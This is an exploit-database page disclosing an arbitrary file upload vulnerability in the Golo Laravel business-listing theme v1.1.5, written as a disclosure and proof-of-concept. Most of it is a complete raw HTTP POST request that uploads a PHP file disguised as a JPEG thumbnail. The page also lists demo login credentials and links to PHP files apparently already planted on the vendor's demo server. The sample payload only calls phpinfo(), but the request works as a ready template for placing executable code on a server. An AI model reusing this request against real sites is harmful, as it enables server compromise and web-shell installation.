Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
CVE
Category
Price
Severity
CWE-434
Not specified
High
Author
Risk
Exploitation Type
Date
Exploitalert Team
High
Remote
2020-07-13
CPE
cpe:cpe:/a:golothemes:golo_business_listing_city_travel_guide_theme_v1.1.5
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070070 Below is a copy:
Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload [+] Exploit Title: Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Google Dork: n/a
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.1.5
[+] Software Link: https://codecanyon.net/item/golo-city-guide-laravel-theme/25785389
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-434
### [ Info: ]
[i] An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v1.1.5.
[i] Demo account: [email protected] / ASKDU@$HDNAJFN@# (login / password)
[i] PoC Link #1: https://lara-business.getgolo.com/uploads/5f09c6d90c71c_1594476249.php
[i] PoC Link #2: https://lara-business.getgolo.com/uploads/5f09c6dcdde81_1594476252.php
[i] PoC Link #3: https://lara-business.getgolo.com/uploads/5f09c6df3b17d_1594476255.php
[i] PoC Link #4: https://lara-business.getgolo.com/uploads/5f09c3f7ec959_1594475511.svg
### [ PoC: ]
[!] POST /place HTTP/1.1
Host: lara-business.getgolo.com
Content-Type: multipart/form-data; boundary=---------------------------24734096191242901897977687797
Content-Length: 4732
Origin: https://lara-business.getgolo.com
Referer: https://lara-business.getgolo.com/new-place
Cookie: [cookies_here]
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="_token"
i6gbRoTMcw6JP9U23pHR3b2IvxSDGrHSPJBroucJ
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[name]"
Night City
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="price_range"
4
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[description]"
PoC
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="category[]"
20
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_type[]"
33
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
13
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
9
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
6
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="country_id"
11
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="city_id"
26
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="address"
31337
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lat"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lng"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="email"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="phone_number"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="website"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][name]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][url]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][title]"
Monday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][title]"
Tuesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][title]"
Wednesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][title]"
Thursday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][title]"
Friday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][title]"
Saturday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][title]"
Sunday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="thumb"; filename="vladvector.php"
Content-Type: image/jpeg
<?php
phpinfo();
?>
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="gallery[]"
vladvector.php
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="video"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_id"
-----------------------------24734096191242901897977687797--
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum